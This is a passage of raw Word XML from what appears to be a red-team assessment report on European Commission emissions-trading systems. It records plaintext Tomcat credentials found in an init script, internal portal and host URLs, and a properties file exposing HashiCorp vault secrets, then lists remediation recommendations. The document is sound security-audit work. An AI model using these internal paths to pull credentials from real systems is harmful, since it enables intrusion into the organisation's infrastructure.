        <w:t xml:space="preserve"> access to sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE80979" w14:textId="77777777" w:rsidR="0037306A" w:rsidRPr="001019D3" w:rsidRDefault="0037306A" w:rsidP="00F533A7">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2203E85D" wp14:editId="0E089020">
            <wp:extent cx="2413000" cy="2290823"/>
            <wp:effectExtent l="19050" t="19050" r="6350" b="0"/>
            <wp:docPr id="42279779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7793" name="Picture 30"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3701" cy="2310476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C074DF" w14:textId="5743368C" w:rsidR="0037306A" w:rsidRPr="001019D3" w:rsidRDefault="0037306A" w:rsidP="00F533A7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Toc213253794"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F533A7" w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> Access to </w:t>
      </w:r>
      <w:r w:rsidR="00F533A7" w:rsidRPr="001019D3">
        <w:t>EUTL PUBLIC database</w:t>
      </w:r>
      <w:r w:rsidR="001019D3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> in acceptance</w:t>
      </w:r>
      <w:r w:rsidR="00F533A7" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p w14:paraId="77506A0C" w14:textId="1F930672" w:rsidR="00F533A7" w:rsidRPr="001019D3" w:rsidRDefault="0037306A" w:rsidP="0037306A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 08/05/2025 5:12 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B08A5" w14:textId="77777777" w:rsidR="00F533A7" w:rsidRPr="001019D3" w:rsidRDefault="00F533A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="630142CC" w14:textId="77777777" w:rsidR="0037306A" w:rsidRPr="001019D3" w:rsidRDefault="0037306A" w:rsidP="00F533A7">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17AE16BF" wp14:editId="4881D04E">
            <wp:extent cx="5518150" cy="2417811"/>
            <wp:effectExtent l="19050" t="19050" r="6350" b="1905"/>
            <wp:docPr id="1455122707"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2707" name="Picture 29"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21892"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5558263" cy="24353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26C7070" w14:textId="697ED61C" w:rsidR="0037306A" w:rsidRPr="001019D3" w:rsidRDefault="0037306A" w:rsidP="00F533A7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc213253795"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F533A7" w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F533A7" w:rsidRPr="001019D3">
        <w:t>Acceptance EUTL PUBLIC database</w:t>
      </w:r>
      <w:r w:rsidR="00F533A7" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> data.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="55225AD8" w14:textId="77777777" w:rsidR="0037306A" w:rsidRPr="001019D3" w:rsidRDefault="0037306A" w:rsidP="0037306A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 08/05/2025 5:22 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F3A399" w14:textId="57DD7373" w:rsidR="00AB312F" w:rsidRPr="001019D3" w:rsidRDefault="00AB312F" w:rsidP="00612210">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Tomcat </w:t>
      </w:r>
      <w:r w:rsidR="00612210" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra JEE Supervisor </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD7DB47" w14:textId="77777777" w:rsidR="00AB312F" w:rsidRPr="001019D3" w:rsidRDefault="00AB312F" w:rsidP="00AB312F">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The Red Team was able to find one configuration file containing plain text user credentials to connect on the Tomcat Hydra JEE Supervisor in a Tomcat server’s installation folder:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB312F" w:rsidRPr="001019D3" w14:paraId="40D50CF3" w14:textId="77777777" w:rsidTr="00845EFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8746" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="33042390" w14:textId="4798CA19" w:rsidR="00AB312F" w:rsidRPr="001019D3" w:rsidRDefault="00612210" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="MacroText"/>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>/ec/local/tomcat/home/tomopert/config/tomcat/init-script.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45B51CD7" w14:textId="77777777" w:rsidR="008C2DCE" w:rsidRPr="001019D3" w:rsidRDefault="006C2B8D" w:rsidP="00612210">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FA535C6" wp14:editId="5F55ECF8">
            <wp:extent cx="5364945" cy="1127858"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="939199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9383"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364945" cy="1127858"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80D812" w14:textId="206DA485" w:rsidR="006C2B8D" w:rsidRPr="001019D3" w:rsidRDefault="008C2DCE" w:rsidP="00612210">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc213253796"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00612210" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Tomcat </w:t>
      </w:r>
      <w:r w:rsidR="00612210" w:rsidRPr="001019D3">
        <w:t>Hydra JEE c</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>redentials</w:t>
      </w:r>
      <w:r w:rsidR="00612210" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> found.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w14:paraId="6378588E" w14:textId="5B7CB794" w:rsidR="008C2DCE" w:rsidRPr="001019D3" w:rsidRDefault="008C2DCE" w:rsidP="008C2DCE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 20/02/2025 11:24 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3604E9" w14:textId="2089A78C" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>This set of credentials was used to access to the following portal:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="005211B2" w:rsidRPr="001019D3" w14:paraId="46952033" w14:textId="77777777" w:rsidTr="00464BA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8946" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="65674A2A" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="00464BA6">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId30" w:history="1">
              <w:r w:rsidRPr="001019D3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>https://intragate.ec.europa.eu/tomcatv2hydra/ui/explorer</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6201106E" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3855EE09" wp14:editId="5B69C97C">
            <wp:extent cx="4056108" cy="1876575"/>
            <wp:effectExtent l="19050" t="19050" r="1905" b="0"/>
            <wp:docPr id="6496235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23526" name="Picture 2"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07421" cy="1900315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE025E0" w14:textId="79DB12D0" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc213253797"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Hydra JEE Supervisor portal access.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="7B19DB03" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 10/06/2025 3:56 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38847817" w14:textId="588FBB9F" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="00072434">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HashiCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> vault secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F3FDB9" w14:textId="188C591A" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Further reviewing content on the Hydra JEE portal, while being authenticated, revealed configuration files that contain authentication properties to access the global </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>HashiCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> vault. The following file contained information including secrets to connect to a vault having namespace EC/CLIMA_E3_SECURITY_ SAM_SECRETS_PRD.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="005211B2" w:rsidRPr="001019D3" w14:paraId="524F3D2C" w14:textId="77777777" w:rsidTr="00464BA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8946" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="105970F6" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="00464BA6">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId32" w:history="1">
              <w:r w:rsidRPr="001019D3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>http://tmmcl00376.cc.cec.eu.int:1051/filesystems/classpathFILE/sam-vault-authentication.properties</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44EA967A" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49C57FA9" wp14:editId="38BF5E19">
            <wp:extent cx="4737100" cy="1474045"/>
            <wp:effectExtent l="19050" t="19050" r="6350" b="0"/>
            <wp:docPr id="193241702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17027" name="Picture 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764507" cy="1482573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="769BA9D2" w14:textId="4B287107" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc213253798"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>HashiCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> vault properties file shows secrets.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w14:paraId="6DC2835A" w14:textId="4CCEE5E2" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 10/06/2025 4:07 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4260168A" w14:textId="5B0E6443" w:rsidR="008C2DCE" w:rsidRPr="001019D3" w:rsidRDefault="005C6A22" w:rsidP="000F2F00">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>These examples illustrate the severe impact that compromised credentials can have to an environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE0232D" w14:textId="4CB1219A" w:rsidR="00612210" w:rsidRPr="001019D3" w:rsidRDefault="00612210" w:rsidP="00612210">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The list of servers used gather credentials and secrets can be found in annex </w:t>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824035 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.3</w:t>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>. Note that this activity could have been done on any system listed in</w:t>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824044 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.1</w:t>
      </w:r>
      <w:r w:rsidR="008E6456" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCDECF3" w14:textId="368FE2F3" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00813E2E" w:rsidP="00612210">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r w:rsidR="00612210" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10568C37" w14:textId="74456F95" w:rsidR="008E6456" w:rsidRPr="001019D3" w:rsidRDefault="008E6456" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Remove and avoid hardcoded credentials in application code, configuration files and scripts </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">located on all ETS WebLogic and Tomcat servers, </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>as such practices significantly increase the risk of credential exposure and compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DE522" w14:textId="06D2B49F" w:rsidR="008E6456" w:rsidRPr="001019D3" w:rsidRDefault="008E6456" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Use secure secrets management solutions to store and access credentials, API keys, tokens, and other confidential information</w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> on ETS WebLogic, Tomcat and any other related servers</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C2A4F" w14:textId="5E72A2F3" w:rsidR="008E6456" w:rsidRPr="001019D3" w:rsidRDefault="008E6456" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Encrypt all sensitive data at rest using industry-standard encryption protocols, ensuring that even if data is accessed unlawfully, it remains unreadable and protected</w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> on all ETS WebLogic and Tomcat servers</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CFF42F" w14:textId="3B467082" w:rsidR="008E6456" w:rsidRPr="001019D3" w:rsidRDefault="008E6456" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Access to secrets and sensitive data </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">located on ETS WebLogic and Tomcat servers </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>should be strictly limited to authorized users, systems, and processes, based on the principle of least privilege and enforced through strong access controls and audit mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A9B94" w14:textId="67812563" w:rsidR="008E6456" w:rsidRPr="001019D3" w:rsidRDefault="008E6456" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
